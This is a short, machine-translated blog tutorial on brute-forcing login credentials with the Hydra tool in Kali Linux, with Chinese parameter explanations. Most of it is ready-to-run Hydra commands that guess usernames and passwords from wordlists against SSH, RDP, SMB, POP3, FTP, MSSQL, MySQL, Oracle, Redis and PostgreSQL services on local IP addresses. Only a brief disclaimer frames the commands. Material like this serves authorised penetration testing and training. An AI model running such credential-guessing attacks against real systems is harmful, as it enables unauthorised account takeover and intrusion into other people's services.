Network Security: Hydra Port Blasting Tool. (Hydra)

Network Security: Hydra Port Blasting Tool. (Hydra)

Hydra, also known as Hydra, is an open source violent PJ tool integrated in Kali. It can blast the accounts and passwords of various services, including Web login, database, SSH, FTP and other services.


Table of contents:

Network Security: Hydra Port Blasting Tool. (Hydra)

Hydra (Hydra) uses:

(1) Actual combat: blasting the SSH protocol. (22 ports)

(2) Actual combat: blasting remote desktop RDP. (port 3389)

(3) Actual combat: blasting shared file SMB (port 445)

(4) Actual combat: blasting mailbox protocol POP3 (port 110)

(5) Actual combat: Blasting file transfer FTP (port 21)

(6) Actual combat: blasting MSSQL database (port 1433)

(7) Actual combat: blasting MySQL database (port 3306)

(8) Actual combat: blasting Oracle database (port 1521)

(9) Actual combat: blasting the Redis database (6379 port)

(10) Actual combat: blasting the PgSQL database (port 5432)


Disclaimer:

It is strictly forbidden to use the technology mentioned in this article to carry out illegal attacks, otherwise the consequences will be at your own risk, and the uploader will not bear any responsibility.


Hydra(九头蛇)使用的参数:

-s 指定端口

-l 指定用户名

-L 指定用户名字典(文件)

-p 指定密码破解

-P 指定密码字典(文件)

-o 保存执行结果

-e 空密码探测和指定用户密码探测(ns)

-C 用户名可以用:分割(username:password)

-vV 显示详细过程

Hydra (Hydra) uses:

How to use: directly open the kali terminal, enter.

hydra


(1) Actual combat: blasting the SSH protocol. (22 ports)

hydra -L /root/root.txt -P /root/root.txt 192.168.0.105 ssh

-L 指定用户名字典(文件)

-P 指定密码字典(文件)

ssh [email protected]            //登录 ssh (22端口)

ssh 账号@地址


(2) Actual combat: blasting remote desktop RDP. (3389 port)

hydra -l administrator -P /root/root.txt 192.168.0.106 rdp -vV

-l 指定用户名

-P 指定密码字典(文件)

-vV 显示详细过程

rdesktop 192.168.0.106:3389        //登录远程桌面3389

rdesktop 地址:3389 


(3) Actual combat: blasting shared file SMB  (port 445)

hydra -l administrator -P /root/root.txt 192.168.0.106 smb

-l 指定用户名

-P 指定密码字典(文件)


(4) Actual combat: blasting mailbox protocol POP3 (port 110)

hydra  -L /root/root.txt -P /root/root.txt 192.168.0.105 pop3 -vV

-L 指定用户名字典(文件)

-P 指定密码字典(文件)

-vV 显示详细过程

(5) Actual combat: Blasting file transfer FTP  (port 21)

hydra  -L /root/root.txt -P /root/root.txt 192.168.0.105 ftp -vV

-L 指定用户名字典(文件)

-P 指定密码字典(文件)

-vV 显示详细过程

(6) Actual combat: blasting MSSQL database (port 1433)

hydra -l sa -P /root/root.txt 192.168.0.106 mssql -vV 

-l 指定用户名

-P 指定密码字典(文件)

-vV 显示详细过程

(7) Actual combat: blasting MySQL database (port 3306)

hydra -L /root/root.txt -P /root/root.txt 192.168.0.106 mysql -vV 

-L 指定用户名字典(文件)

-P 指定密码字典(文件)

-vV 显示详细过程

(8) Actual combat: blasting Oracle database (port 1521)

hydra -L /root/root.txt -P /root/root.txt 192.168.0.106 oracle -vV 

-L 指定用户名字典(文件)

-P 指定密码字典(文件)

-vV 显示详细过程

(9) Actual combat: blasting the Redis database (6379 port)

hydra -L /root/root.txt -P /root/root.txt 192.168.0.106 redis -vV 
 
-L 指定用户名字典(文件)

-P 指定密码字典(文件)

-vV 显示详细过程

(10) Actual combat: blasting the PgSQL database (port 5432)

hydra -L /root/root.txt -P /root/root.txt 192.168.0.106 postgresql -vV

-L 指定用户名字典(文件)

-P 指定密码字典(文件)

-vV 显示详细过程

     

      

      

Guess you like

Origin blog.csdn.net/weixin_54977781/article/details/130703003